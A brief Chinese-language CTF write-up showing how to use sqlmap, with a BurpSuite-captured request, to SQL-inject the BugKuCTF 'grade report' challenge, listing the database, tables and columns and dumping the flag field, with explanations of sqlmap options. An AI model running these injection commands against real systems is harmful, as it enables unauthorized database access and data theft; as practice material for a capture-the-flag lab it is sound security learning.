CTF|sqlmap的简单使用

• 工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap
• 示例：BugKuCTF题 成绩单

初步测试1
BurpSuite开启代理，随意输入一个id，BurpSuite导出为文件
image.png
拿出命令行，准备开撸
命令sqlmap -r 成绩单.txt -p id --current-db 获取当前数据库名称
参数说明

-r   加载一个文件 
-p  指定参数 
--current-db  获取数据库名称
此外
-u   指定url
 --method POST    POST方式，搭配 --data "id=1" 食用  
--cookie "id=1"       带上cookie
-threads                 指定线程数
--dbms                    指定数据库类型

拿到数据库名

命令sqlmap -r 成绩单.txt -p id -D skctf_flag --tables 获取指定数据库的表

-D       指定数据库名称 
--tables    列举数据库中的表

拿到表名
命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g --columns获取指定表的字段 image.png
命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump打印指定字段的内容 image.png